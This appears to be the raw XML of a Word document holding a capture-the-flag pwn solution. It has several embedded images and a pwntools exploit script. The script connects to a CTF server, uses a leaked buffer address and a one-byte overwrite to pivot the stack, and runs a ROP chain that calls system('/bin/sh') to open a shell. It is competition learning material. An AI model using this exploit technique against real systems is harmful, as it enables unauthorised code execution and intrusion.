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DD9F8" w14:textId="48969849" w:rsidR="009C5915" w:rsidRDefault="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545D0880" wp14:editId="6C7C2294">
            <wp:extent cx="5274310" cy="6870700"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1479016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165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CBFC" w14:textId="5FC86920" w:rsidR="00CB3191" w:rsidRDefault="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2675E750" wp14:editId="2EC46827">
            <wp:extent cx="5274310" cy="6971030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1945695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959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9191" w14:textId="4F57DAE8" w:rsidR="00CB3191" w:rsidRDefault="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7875CC85" wp14:editId="2EC27A9A">
            <wp:extent cx="5274310" cy="6513195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1771037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379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EA75" w14:textId="141D15F2" w:rsidR="00CB3191" w:rsidRDefault="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ADF95C5" wp14:editId="244253DD">
            <wp:extent cx="5274310" cy="6835775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="389220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01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9646" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089AA9BD" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191"/>
    <w:p w14:paraId="306E74E1" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>context(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>",arch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>="amd64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>",log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>_level="debug")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18869E94" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>elf=ELF(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>"./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E4823" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>=0x4011F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA265A5" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:lastRenderedPageBreak/>
        <w:t>ret=0x4011F6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33223964" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>system=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>elf.plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>["system"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430091FC" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191"/>
    <w:p w14:paraId="07ED5687" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>io=remote("nc1.ctfplus.cn",23968)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D34B0" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>b"Desk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve"> stamp: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B0DE4" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D0C861" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>b"Claim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve"> check: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A42874" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>=int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.recvline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>).strip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B09D3D" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>low=buf&amp;0xff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D28B8" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>if low&lt;=0x8f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FE28D" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    off=0x48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72830E8A" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve"> low&gt;=0xb8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D1C3BD" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    off=0x100-low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124EEA07" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>payload=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>flat(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7874C324" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    b"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>\x00</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>".ljust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>off,b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326F298D" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D99C83B" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3809C" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89C034" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    ret,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F7B70" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t>    system,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F2492" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>word_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>=64,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AC750" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>ljust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(0x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>70,b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>"B")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD0C7A" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D45194" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>b"night</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t xml:space="preserve"> clerk:\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504A6984" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>b"D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>"*0x20+p8((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>buf+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>0xff))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BEC31F" w14:textId="77777777" w:rsidR="00CB3191" w:rsidRPr="00CB3191" w:rsidRDefault="00CB3191" w:rsidP="00CB3191">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>io.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CB3191">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249C5D99" w14:textId="1E5051C2" w:rsidR="00CB3191" w:rsidRDefault="00CB3191">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CB31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F85"/>
    <w:rsid w:val="00335F6E"/>
    <w:rsid w:val="003F1F85"/>
    <w:rsid w:val="00581160"/>
    <w:rsid w:val="009C5915"/>
    <w:rsid w:val="00CB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76FC3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EB1BAEB5-3228-4F99-A426-0376C8D5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F1F8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1F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1F8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1F8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1F8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1F8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1F8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1F8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1F8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F1F8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F1F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F1F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F1F8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F1F8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F1F8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F1F8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F1F8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F1F8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F1F8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F1F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F1F8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F1F8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F1F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F1F8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F1F8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F1F8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F1F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F1F8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F1F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施禹 褚</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>施禹 褚</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-14T04:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-14T04:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>